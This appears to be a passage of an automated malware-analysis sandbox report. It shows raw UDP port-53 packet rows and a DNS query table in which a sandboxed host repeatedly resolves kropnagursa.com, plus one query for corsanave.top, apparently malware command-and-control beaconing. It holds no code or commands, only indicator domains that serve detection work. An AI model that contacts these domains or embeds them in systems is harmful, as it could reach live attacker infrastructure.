                                                                                                                                            Feb 2, 2023 21:19:52.517765999 CET6252153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:52.534813881 CET53625218.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:53.379025936 CET6090053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:53.395939112 CET53609008.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:54.217449903 CET5345053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:54.234714985 CET53534508.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:54.692434072 CET5624353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:54.713092089 CET53562438.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:55.552577019 CET5531153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:55.571957111 CET53553118.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:56.038275957 CET6398153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:56.056992054 CET53639818.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:56.722712040 CET6010553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:56.742050886 CET53601058.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:57.199896097 CET6239453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:57.217751026 CET53623948.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:58.049459934 CET4944753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:58.067163944 CET53494478.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:58.902945995 CET6217653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:58.922283888 CET53621768.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:19:59.714857101 CET6479053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:19:59.731781960 CET53647908.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:00.179670095 CET5529853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:20:00.198966980 CET53552988.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:01.281001091 CET5813953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:20:01.298454046 CET53581398.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:01.754502058 CET6130853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:20:01.773526907 CET53613088.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:02.238293886 CET4933553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:20:02.255429983 CET53493358.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:02.912820101 CET6420853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:20:02.931781054 CET53642088.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:03.384833097 CET6249453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:20:03.401957989 CET53624948.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:04.069204092 CET6359553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:20:04.088618994 CET53635958.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:04.550748110 CET5412053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:20:04.567712069 CET53541208.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:05.700215101 CET5399253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:20:05.719261885 CET53539928.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:06.182370901 CET4920753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:20:06.199726105 CET53492078.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:07.001142025 CET5954353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:20:07.018198967 CET53595438.8.8.8192.168.2.4

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Feb 2, 2023 21:16:55.050714970 CET192.168.2.48.8.8.80x511fStandard query (0)corsanave.topA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:16:58.169195890 CET192.168.2.48.8.8.80x8cf6Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:16:58.726520061 CET192.168.2.48.8.8.80x4aefStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:16:59.283485889 CET192.168.2.48.8.8.80x6025Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:16:59.847026110 CET192.168.2.48.8.8.80xcda7Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:00.414314032 CET192.168.2.48.8.8.80xf15eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:01.079452038 CET192.168.2.48.8.8.80x3f41Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:01.693108082 CET192.168.2.48.8.8.80x3922Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:02.354043007 CET192.168.2.48.8.8.80x7b47Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:02.968358994 CET192.168.2.48.8.8.80xc15aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:03.734210968 CET192.168.2.48.8.8.80xc725Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:05.823209047 CET192.168.2.48.8.8.80x63f4Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:06.584966898 CET192.168.2.48.8.8.80xc43fStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:07.113226891 CET192.168.2.48.8.8.80x795cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:07.836095095 CET192.168.2.48.8.8.80x566bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:08.518951893 CET192.168.2.48.8.8.80xd0dcStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:09.127360106 CET192.168.2.48.8.8.80xaed2Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:09.879239082 CET192.168.2.48.8.8.80x7263Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:10.422660112 CET192.168.2.48.8.8.80xf1eaStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:11.122325897 CET192.168.2.48.8.8.80x9722Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:11.610620022 CET192.168.2.48.8.8.80x8047Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:12.272988081 CET192.168.2.48.8.8.80xfec6Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:12.979702950 CET192.168.2.48.8.8.80x935aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:13.614512920 CET192.168.2.48.8.8.80x46ffStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:14.383872032 CET192.168.2.48.8.8.80x1e55Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:14.996670961 CET192.168.2.48.8.8.80xe6c3Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:15.514900923 CET192.168.2.48.8.8.80x8783Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:16.047163010 CET192.168.2.48.8.8.80xfdf1Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:16.695384979 CET192.168.2.48.8.8.80x8247Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:17.344476938 CET192.168.2.48.8.8.80xcbeeStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:17.853440046 CET192.168.2.48.8.8.80x3e1bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:18.347096920 CET192.168.2.48.8.8.80xcfc6Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:18.959134102 CET192.168.2.48.8.8.80xd5aaStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:19.869586945 CET192.168.2.48.8.8.80xabbStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:20.490375042 CET192.168.2.48.8.8.80x307bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:20.976861000 CET192.168.2.48.8.8.80x4506Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:22.079495907 CET192.168.2.48.8.8.80x271bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:22.771451950 CET192.168.2.48.8.8.80xa645Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:23.538954973 CET192.168.2.48.8.8.80xa019Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:24.215837955 CET192.168.2.48.8.8.80x357Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:24.705131054 CET192.168.2.48.8.8.80xaab4Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:25.266366959 CET192.168.2.48.8.8.80x8065Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:25.926310062 CET192.168.2.48.8.8.80x439eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:26.424199104 CET192.168.2.48.8.8.80xf869Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:26.914838076 CET192.168.2.48.8.8.80x67b7Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:27.492784977 CET192.168.2.48.8.8.80x151fStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:28.161072016 CET192.168.2.48.8.8.80x6c6aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:28.959558010 CET192.168.2.48.8.8.80x9cd5Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:29.451267004 CET192.168.2.48.8.8.80xcf17Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:30.100574017 CET192.168.2.48.8.8.80x7310Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:30.790383101 CET192.168.2.48.8.8.80xf0aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:31.324011087 CET192.168.2.48.8.8.80x7d04Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:31.824964046 CET192.168.2.48.8.8.80x37cfStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:32.429197073 CET192.168.2.48.8.8.80x2598Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:33.050224066 CET192.168.2.48.8.8.80x3381Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:33.617413044 CET192.168.2.48.8.8.80xc275Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:34.291446924 CET192.168.2.48.8.8.80x310dStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:34.771294117 CET192.168.2.48.8.8.80x40cfStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:35.284569979 CET192.168.2.48.8.8.80xeb75Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:35.766735077 CET192.168.2.48.8.8.80x9c92Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:36.515197039 CET192.168.2.48.8.8.80x42aeStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:37.010292053 CET192.168.2.48.8.8.80x2e19Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:37.614087105 CET192.168.2.48.8.8.80xb3c0Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:38.121016979 CET192.168.2.48.8.8.80xf865Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:39.031106949 CET192.168.2.48.8.8.80x7bb0Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:39.720971107 CET192.168.2.48.8.8.80xbd4cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:40.207515955 CET192.168.2.48.8.8.80xd031Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:40.837795019 CET192.168.2.48.8.8.80xa595Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:41.324842930 CET192.168.2.48.8.8.80xe145Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:41.794392109 CET192.168.2.48.8.8.80x68b7Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:42.278362036 CET192.168.2.48.8.8.80x2b5cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:42.752785921 CET192.168.2.48.8.8.80x5dbStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:43.258919001 CET192.168.2.48.8.8.80xb253Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:43.731535912 CET192.168.2.48.8.8.80x5836Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:44.387408018 CET192.168.2.48.8.8.80x4dd4Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:44.871865988 CET192.168.2.48.8.8.80x828bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:45.375560045 CET192.168.2.48.8.8.80x1dc7Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:46.147797108 CET192.168.2.48.8.8.80xd421Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:46.626087904 CET192.168.2.48.8.8.80x86e9Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:47.184736013 CET192.168.2.48.8.8.80x29d8Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:47.669491053 CET192.168.2.48.8.8.80x6155Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:48.194976091 CET192.168.2.48.8.8.80xf27cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:48.673832893 CET192.168.2.48.8.8.80xd047Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:49.362209082 CET192.168.2.48.8.8.80xd501Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:49.859575033 CET192.168.2.48.8.8.80x5db4Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:50.423947096 CET192.168.2.48.8.8.80x99e1Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:51.228626013 CET192.168.2.48.8.8.80x5734Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:51.703941107 CET192.168.2.48.8.8.80xad27Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:53.147264957 CET192.168.2.48.8.8.80x2295Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:53.630599976 CET192.168.2.48.8.8.80x8f6aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:54.116086960 CET192.168.2.48.8.8.80xac81Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:54.609215021 CET192.168.2.48.8.8.80x84bdStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:55.168179989 CET192.168.2.48.8.8.80x2963Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:57.054074049 CET192.168.2.48.8.8.80xa0aeStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:58.061589956 CET192.168.2.48.8.8.80x3f54Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:58.569401026 CET192.168.2.48.8.8.80x3b7Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:17:59.563241959 CET192.168.2.48.8.8.80x233aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:00.081393003 CET192.168.2.48.8.8.80x2bedStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:00.791280985 CET192.168.2.48.8.8.80xb5eaStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:01.281635046 CET192.168.2.48.8.8.80x5f51Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:01.761099100 CET192.168.2.48.8.8.80x736fStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:02.612816095 CET192.168.2.48.8.8.80x6281Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:03.089128971 CET192.168.2.48.8.8.80xa554Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:03.598226070 CET192.168.2.48.8.8.80x5c4aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:04.083024979 CET192.168.2.48.8.8.80x674cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:04.722486019 CET192.168.2.48.8.8.80xb69eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:05.362410069 CET192.168.2.48.8.8.80xe0a2Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:06.033932924 CET192.168.2.48.8.8.80x952dStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:06.508181095 CET192.168.2.48.8.8.80x3060Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:07.395318031 CET192.168.2.48.8.8.80x9c4Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:07.872427940 CET192.168.2.48.8.8.80xfc29Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:08.524291992 CET192.168.2.48.8.8.80x646aStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:09.025505066 CET192.168.2.48.8.8.80xd5adStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:09.508091927 CET192.168.2.48.8.8.80x1102Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:09.981499910 CET192.168.2.48.8.8.80x3a16Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:10.524434090 CET192.168.2.48.8.8.80xfeabStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:11.001646996 CET192.168.2.48.8.8.80xb416Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:11.482815027 CET192.168.2.48.8.8.80x5617Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:12.006372929 CET192.168.2.48.8.8.80x3807Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:12.544226885 CET192.168.2.48.8.8.80x2da1Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:13.473978996 CET192.168.2.48.8.8.80xf23dStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:14.152349949 CET192.168.2.48.8.8.80xb3dbStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:14.634895086 CET192.168.2.48.8.8.80x70a8Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:15.346041918 CET192.168.2.48.8.8.80x9502Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:15.823925018 CET192.168.2.48.8.8.80x4983Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:16.299076080 CET192.168.2.48.8.8.80x45c8Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:16.781172991 CET192.168.2.48.8.8.80xc0bcStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:17.426433086 CET192.168.2.48.8.8.80xc624Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:18.359124899 CET192.168.2.48.8.8.80xb21Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:18.846774101 CET192.168.2.48.8.8.80x1cd7Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:19.325022936 CET192.168.2.48.8.8.80x15d6Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:19.809020996 CET192.168.2.48.8.8.80x6b66Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:20.293732882 CET192.168.2.48.8.8.80x806Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:20.928692102 CET192.168.2.48.8.8.80xccdeStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:21.709866047 CET192.168.2.48.8.8.80x94e6Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:22.180458069 CET192.168.2.48.8.8.80x6016Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:22.662606955 CET192.168.2.48.8.8.80xbaf5Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:23.214318991 CET192.168.2.48.8.8.80x5a12Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:23.980293036 CET192.168.2.48.8.8.80x416eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:24.450906038 CET192.168.2.48.8.8.80xd36eStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:24.933141947 CET192.168.2.48.8.8.80xfb5Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:25.433326006 CET192.168.2.48.8.8.80xae72Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:25.932605028 CET192.168.2.48.8.8.80x7fceStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:26.678611040 CET192.168.2.48.8.8.80xe35bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:27.166964054 CET192.168.2.48.8.8.80xb433Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:28.349351883 CET192.168.2.48.8.8.80xaa52Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:28.851371050 CET192.168.2.48.8.8.80x4222Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:29.393095970 CET192.168.2.48.8.8.80xa2c2Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:30.233381033 CET192.168.2.48.8.8.80x2637Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:30.934063911 CET192.168.2.48.8.8.80x1c15Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:31.422344923 CET192.168.2.48.8.8.80x6bebStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:31.889811993 CET192.168.2.48.8.8.80x2552Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:32.362930059 CET192.168.2.48.8.8.80x1cfbStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:32.837332964 CET192.168.2.48.8.8.80x111cStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:33.475529909 CET192.168.2.48.8.8.80x770bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:33.963814974 CET192.168.2.48.8.8.80xfb6bStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:34.714102983 CET192.168.2.48.8.8.80xe614Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:35.196199894 CET192.168.2.48.8.8.80x4676Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:35.972194910 CET192.168.2.48.8.8.80xda91Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:36.448235989 CET192.168.2.48.8.8.80xbe7Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:37.541754007 CET192.168.2.48.8.8.80x4c83Standard query (0)kropnagursa.comA (IP address)IN (0x0001)false
                                                                                                                                            Feb 2, 2023 21:18:38.012161970 CET192.168.2.48.8.8.80x6eafStandard query (0)kropnagursa.comA (IP address)IN (0x0001)false
